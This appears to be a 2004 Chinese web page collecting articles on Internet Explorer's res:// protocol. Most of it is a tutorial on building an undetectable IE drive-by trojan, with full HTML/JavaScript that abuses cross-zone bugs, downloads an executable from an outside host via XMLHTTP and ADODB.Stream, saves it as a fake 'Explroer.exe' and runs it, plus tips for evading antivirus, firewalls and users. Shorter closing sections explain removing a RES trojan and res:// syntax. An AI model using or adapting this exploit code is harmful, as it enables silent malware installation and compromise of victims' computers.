Res协议，专题

打造完美的ＩＥ网页木马

发表：2004-5-20 19:41:00 出处：你的博客网(yourblog.org)

---

打造完美的ＩＥ网页木马 icyfox    

  （测试页面:http://www.godog.y365.com/runexe/icyfox.htm，此处所运行的程序不是木马！)

　　既然要打造完美的ＩＥ网页木马，首先就必须给我们的完美制定一个标准，我个人认为一个完美的ＩＥ网页木马至少应具备下列四项特征：
　　一：可以躲过杀毒软件的追杀；
　　二：可以避开网络防火墙的报警；
　　三：能够适用于多数的ＷＩＮＤＯＷＳ操作系统（主要包括ＷＩＮ９８、ＷＩＮＭＥ、ＷＩＮ２０００、ＷＩＮＸＰ、ＷＩＮ２００３）中的多数ＩＥ版本（主要包括ＩＥ５．０、ＩＥ５．５、ＩＥ６．０），最好能打倒ＳＰ补丁；
　　四：让浏览者不容易发觉ＩＥ变化，即可以悄无声息，从而可以长久不被发现。
　　（注意以上四点只是指网页本身而言，但不包括你的木马程序，也就是说我们的网页木马只是负责运行指定的木马程序，至于你的木马程序的好坏只有你自己去选择啦！别找我要，我不会写的哦！）
　　满足以上四点我想才可以让你的马儿更青春更长久，跑的更欢更快……
　　看了上面的几点你是不是心动拉？别急，我们还是先侃侃现有的各种ＩＥ网页木马的不足吧！
　　第一种：利用古老的MIME漏洞的ＩＥ网页木马
　　这种木马现在还在流行，但因为此漏洞太过古老且适用的ＩＥ版本较少，而当时影响又太大，补丁差不多都补上啦，因此这种木马的种植成功率比较低。
　　第二种：利用com.ms.activeX.ActiveXComponent漏洞，结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马
　　虽然com.ms.activeX.ActiveXComponent漏洞广泛存在于多数ＩＥ版本中，是一个比较好的漏洞，利用价值非常高，但却因为它结合了流行的病毒调用的ＷＳＨ及ＦＳＯ控件，使其虽说可以避开网络防火墙的报警，可逃不脱杀毒软件的追捕（如诺顿）。
　　第三种：利用OBJECT对象类型确认漏洞（Ｏｂｊｅｃｔ　Ｄａｔａ　Ｒｅｍｏｔｅ）并结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马（典型的代表有动鲨网页木马生成器）
　　此种木马最大的优点是适应的ＩＥ版本多，且漏洞较新，但却有如下不足：
　　１、因为此漏洞要调用Mshta.exe来访问网络下载木马程序，所以会引起防火墙报警（如天网防火墙）；
　　２、如果此ＩＥ网页木马又利用了ＷＳＨ及ＦＳＯ控件，同样逃不脱杀毒软件的追捕（如诺顿），而
动鲨网页木马又恰恰使用了ＷＳＨ及ＦＳＯ控件，叹口气……可惜呀……？
　　３、再有就是这个漏洞需要网页服务器支持动态网页如ＡＳＰ、ＪＳＰ、ＣＧＩ等，这就影响了它的发挥，毕竟现在的免费稳定的动态网页空间是少之又少；虽说此漏洞也可利用邮件ＭＩＭＥ的形式（见我在安全焦点上发表的文章：《由错误MIME漏洞的利用想到的......---IE Object Data 数据远程执行漏洞的利用》http://www.xfocus.net/articles/200309/607.html）来利用，但经测试发现对ＩＥ６．０不起作用。
　　看到上面的分析你是不是有了这种感觉：千军易得，一将难求，马儿成群，奈何千里马难寻！别急，下面让我带这大家一起打造我心中的完美ＩＥ网页木马。
　　首先要躲过杀毒软件的追杀，我们就不能利用ＷＳＨ和ＦＳＯ控件，因为只要利用了ＷＳＨ和ＦＳＯ控件就一定逃不脱“诺顿”的追杀，这可叫我们该如何是好？！别急，经过我的努力工作（说真的我也是在研究ＡＳＰ木马时偶然发现的灵感）终于我有找到了一个可以用的控件，那就是 shell.application，并且它可是经过了安全认证的，可以在“我的电脑”域中的网页中畅通无阻的执行，比ＷＳＨ和ＦＳＯ更容易得到执行权限（利用跨域漏洞即可），请看下面javascript代码：
<SCRIPT LANGUAGE="javascript" type="text/javascript">
var shell=new ActiveXObject("shell.application");
shell.namespace("c://Windows//").items().item("Notepad.exe").invokeverb();
</SCRIPT>
保存为test.htm后打开看是否自动打开了记事本程序，而且不会象ＷＳＨ和ＦＳＯ那样出现是否允许运行的提示框，是不是有点兴趣啦？现在我们已可以运行所有已知路径的程序，但我们要求运行我们自己的木马程序，所以还要求把我们的木马程序下载到浏览者的电脑上并找出它的位置。我们一个个来解决：
　　１、下载木马程序到浏览者的电脑中
　　这一点可以有很多解决方法，比如我以前提到的ＷＩＮＤＯＷＳ帮助文件访问协议下载任意文件漏洞（its:），不过这次我们不用它，再教大家两个更好的下载方法：
　　例一：利用SCRIPT标签，代码如下：
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>
注意此处的LANGUAGE属性可以为除javascript、VBScript、JScript以外的字符串,也可以是汉字，至于src的属性当然是你的木马程序的地址啦！因为现在免费空间出于安全考虑，多数不允许上传exe文件，我们可以变通一下把扩展名exe改为bat或pif、scr、com，同样可以运行。
　　例二：利用LINK标签，代码如下：
<LINK href="http://www.godog.y365.com/wodemuma/icyfox.bat" rel=stylesheet type=text/css>
把代码放在标签<HEAD></HEAD>中间，href属性值为木马程序的地址。
上面两个是我所知的最好的两种下载木马程序的方法，它们下载后的程序都保存在在ＩＥ临时目录Temporary Internet Files目录下的子目录中。
　　２、找出已下载到浏览者的脑中的木马程序路径
　　我们可以利用shell.application控件的一些属性和方法，并结合js的错误处理try{}catch(e){}finally{}语句,进行递归调用来找到木马程序的路径，代码如下：

function icyfoxlovelace(){
//得到ＷＩＮＤＯＷＳ系统目录和系统盘
url=document.location.href;
xtmu=url.substring(6,url.indexOf(’//’,9)+1);
xtp=url.substr(6,3);

var shell=new ActiveXObject("shell.application");
var runbz=1;

//此处设置木马程序的大小，以字节为单位
//请把198201改为你的木马程序的实际大小
var exeSize=198201;

//设置木马程序名及扩展名(exe,com,bat,pif,scr)，用于判断是否是所下载的木马程序
//请把下面两行中的icyfox改为你的木马程序名，bat改为你的木马程序的扩展名
var a=/icyfox/[/d*/]/.bat/gi;
a.compile("icyfox//[//d*//]//.bat","gi");

var b=/[A-Za-z]:///gi;
b.compile("[A-Za-z]:////","gi");//正则表达式,用于判断是否是盘的根目录

//下面的代码查找并运行木马程序
wjj(xtmu+"Temporary Internet Files//");//Content.IE5/if(runbz)wjj(xtp+"Documents and Settings//");
if(runbz)yp();

//在所有硬盘分区下查找并运行木马程序
function yp(){
try{
var c=new Enumerator(shell.namespace("c://").ParentFolder.Items());
for (;!c.atEnd();c.moveNext()){
if(runbz){if(b.test(c.item().path))wjj(c.item().path);}
else break;
}
}catch(e){}
}

//利用递归在指定目录(包括子目录)下查找并运行木马程序
function wjj(b){
try{
var c=new Enumerator(shell.namespace(b).Items());
for (;!c.atEnd();c.moveNext()){
if(runbz&&c.item().Size==exeSize&&a.test(c.item().path)){
var f=c.item().path;
var v=f.lastIndexOf(’//’)+1;
try{
shell.namespace(f.substring(0,v)).items().item(f.substr(v)).invokeverb();//运行木马程序
runbz=0;
break;
}catch(e){}
}
if(!c.item().Size)wjj(c.item().path+"//");//如果是子目录则递归调用
}
}catch(e){}
}


}

icyfoxlovelace();

请把以上代码保存为icyfox.js。

　　接下来我们就要利用一个小小跨域执行漏洞，来获得“我的电脑”域的网页权限，大家以前是不是和我一样觉得这种漏洞仅仅只能用来进行跨站脚本攻击，得到COOKIE之类的东东呢？这次它终于可以露脸啦！代码如下：

<HTML>
<HEAD>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<TITLE>冰狐浪子网络技术实验室的完美ＩＥ网页木马</TITLE>
</HEAD>
<BODY oncontextmenu="return false" onselectstart="return false" scroll="no" topmargin="0" leftmargin="0">
<SCRIPT LANGUAGE="icyfoxlovelace" src="http://www.godog.y365.com/wodemuma/icyfox.bat"></SCRIPT>
<SCRIPT LANGUAGE="javascript">
//此处设置上面icyfox.js文件的网络地址
//请把http://www.godog.y365.com/wodemuma/icyfox.js改为你的icyfox.js文件实际上传地址
jsurl="http://www.godog.y365.com/wodemuma/icyfox.js".replace(////g,’//’);
WIE=navigator.appVersion;
if(WIE.indexOf("MSIE 5.0")>-1){
/*IE 5.0利用iframe标签,src属性设为icyfox://则会使此标签具备“我的电脑”域的权限,原因是因为icyfox://是不存在的协议，所以会ＩＥ会利用res://协议打开SHDOCLC.DLL中的语法错误页syntax.htm，而且SHDOCLC.DLL又位于系统目录中，为在 icyfox.js中得到ＷＩＮＤＯＷＳ系统目录和系统盘提供数据；*/
document.write("<iframe style=’display:none;’ name=’icyfoxlovelace’ src=’icyfox://’><//iframe>");
setTimeout("muma0()",1000);
}
else {
/*IE5.5、 IE6.0则利用_search漏洞，把打开的地址设为icyfox://，从而使_search搜索框具备“我的电脑”域的权限，因为在IE6.0中无法用上面的iframe漏洞，IE5.5应该可以用，我没有测试。这样做的结果会打开搜索栏,有点遗憾！*/
window.open("icyfox://","_search");
setTimeout("muma1()",1000);
}

//下面利用file:javascript:协议漏洞在已是我的电脑”域的权限的“icyfox://”中插入icyfox.js脚本并运行
function muma0(){
window.open("file:javascript:document.all.tags(’SCRIPT’)[0].src=’"+jsurl+"’;eval();","icyfoxlovelace");
}

function muma1(){
window.open("file:javascript:document.all.tags(’SCRIPT’)[0].src=’"+jsurl+"’;eval();","_search");}
</SCRIPT>
</BODY>
<NOSCRIPT><iframe style="display:none;" src=’*.*’></iframe></NOSCRIPT>
</HTML>

把上面的代码保存为icyfox.htm,如果你愿意可以把扩展名改为jpg并在网页中加入一个精美的图片背景，来做一个图片木马，甚至你可以改为 exe，来冒充一个好的程序的下载地址，并在网页的<HEAD></HEAD>中加入标签<meta http-equiv="refresh" content="5;url=’http://www.godog.y365.com/winrar.exe’">来定时转到另一个真正的程序下载地址，从而更好的欺骗别人。

　　看到上面的东东是不是让你有了马上去实验的冲动，别急，如果你觉得win98没必要控制的话，还有更好的木马等着你，不知大家是否用过 win2000、winxp等系统中默认安装的ADODB.Stream及Microsoft.XMLHTTP控件？它们可是和 shell.application控件一样是经过了安全认证的，可以在“我的电脑”域中的网页中畅通无阻执行的好东西呀！请看下面的代码：

function icyfox(){
//设置下载后保存在系统目录下的木马程序名，我设的是不是很象Explorer.exe呀？呵呵
var name="Explroer.exe";
//设置你要下载的木马程序的地址（此处你可以把扩展名任意改，甚至没有扩展名也可以的)
//可以更好的躲过免费主页空间的上传限制
var url="http://www.godog.y365.com/wodemuma/icyfox.bat";
try{
var folder=document.location.href;
folder=folder.substring(6,folder.indexOf(’//’,9)+1)+name;
var xml=new ActiveXObject("Microsoft.XMLHTTP");
xml.open("GET",url,false);
xml.send();
if(xml.status==200){
var ado=new ActiveXObject("ADODB.Stream");
ado.Type=1;
ado.Open();
ado.write(xml.responseBody);
ado.SaveToFile(folder,2);
ado.Close();
ado=null;
}
xml=null;
document.body.insertAdjacentHTML(’AfterBegin’,’<OBJECT style="display:none;" TYPE="application/x-oleobject" CODEBASE="’+folder+’"></OBJECT>’);
}
catch(e){}

}

icyfox();

把上面的的代码保存为icyfox.js替换上面保存的icyfox.js文件，同样利用上面的icyfox.htm来注入到“我的电脑”域中，呵呵你就偷这乐吧！
　　最后还请大家发挥以下DIY的能力把上面两种代码合二为一，我相信一个现阶段最最完美的ＩＥ网页木马就会在你手中诞生啦！是不是神不知鬼不觉？
提示代码如下：
try{new ActiveXObject("ADODB.Stream");icyfox();}catch(e){icyfoxlovelace();}

呵呵……很晚啦,我要睡觉去啦,886

从修复about:blank默认页面到RES病毒的查杀

有些朋友经常抱怨，自己把IE的主页设置为了about:blank还是进入别的站点。我们应该怎样面对这种烦人的现象呢？
     首先我们要先看一下设置为about:blank后打开IE系统是怎样工作的。
     IE会进入一个空白页面，其实这个页面其实是指向了一个地址，默认是res://mshtml.dll/blank.htm 
     这个地址是可以修改的，其修改地址就在注册表中相应注册键是
     HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/AboutURLs
     进去看看吧，把他修改回默认的值或者你喜欢的网页都可以。

     这种情况下往往是由于RES协议造成的。说到RES就不得不提一下RES病毒。最近网上在流传杀不干净得木马吧
 
     这些也就是一些杀毒软件杀不完全病毒造成的，用杀毒软件杀毒后，过不了多久就会继续中标。此类木马利用了RES协议的漏洞，手段很隐蔽。

     下面我们看一下RES木马的原理。我们在用IE浏览网页的时候，系统会调用shdoclc.dll中的资源，windows系统规定在载入dll文件的时候，如果dll文件含有dllmain函数就对它进行初始化，但是正常的shdoclc.dll文件是没有dllmain函数的，他只是包含了各种资源而已。RES木马包含的dllmain函数，利用这一点，我们就会在浏览网页的时候自动中招。

    我们了解了RES木马原理后，我们便可以把系统的RES给找出来了。原shdoclc.dll文件没有任何执行代码，其函数输出表应该为空，但是木马就会调用系统的API函数。我们根据这点来查出系统的RES内鬼。

    我们要使用的工具是DEPENDENCY WALKER来查看其API输出表即可。
    运行解压后的文件，使用"FLIE-OPEN"打开shdoclc.dll文件
    【默认地址在:c:/windows/sysytm32/shdoclc.dll】
    查看左面的函数输出表如果为空表明你没有中这种毒。

    如果已经中标了，重启到安全模式，用sfc命令恢复即可，或者从别人机器拷贝一个也可以。

RES协议

编号：QA000673
建立日期: 1999年3月22日 最后修改日期：1999年3月22日
所属类别：

C/C++ - Internet编程

Ding:
    据微软公司说IE4的URL支持RES协议，具体的语法为："res://resource file[/resourcetype]/resource id" ，我试过
    "res://c:/windows/system/shdocvw.dll/navcancl.htm"，没问题；但如自己用VC作个DLL， 就怎么也不行，不知何故？

回答:

    由于你没有说你是如何制作DLL和调用你自己的DLL的。这里只好详细地介绍一下res://协议的详细用法。Res://协议是IE 4.0预定义的一个协议，它的基本语法正如你所说的。其中resource file指的是含有资源的模块的文件名，请注意这里的路径分隔符只能使用“/”，而不能使用“/”。 Resourcetype是资源类型，它是一个字符串或数字。常用的资源类型都对应着一个数，比如BITMAP对应着RT_BITMAP=2，这些常数定义在VC++的WINUSER.H可以找到，如果资源类型是数字，要在数字前面加上“#”号。Resourcetype可以省略，默认为RT_HTML=23，即HTML文件。RT_HTML在VC++ 5.0中没有定义，但现在已经广泛使用。 Resource id表示资源的ID号。在这里要注意一个问题：在VC++中定义资源的时候，通常是使用数字常量，比如ID_BITMAP1，它代表的数字可能是101。而在使用res://协议时，不能使用ID_BITMAP1（在DLL中并没有这个符号），而必须使用#101来代表资源。例如要显示一个位图资源，其ID号为101，应为res://mydll.dll/#2/#101。
    如果在VC++制作的DLL中加入HTML资源文件，可以这样做：选择Import资源，然后选择一个HTML文件，当VC++提示资源类型时输入23（下图）。然后修改该属性的ID，例如"MYHTML.HTM"。这里的引号是必须输入的，如果不输入引号，VC++会指定一个数字给这个资源，调用的方法会有所不同。这样你可以使用res://mydll.dll/myhtml.htm来调用这个HTML文件。HTML文件中包含的图形文件也应该以这种方式插入。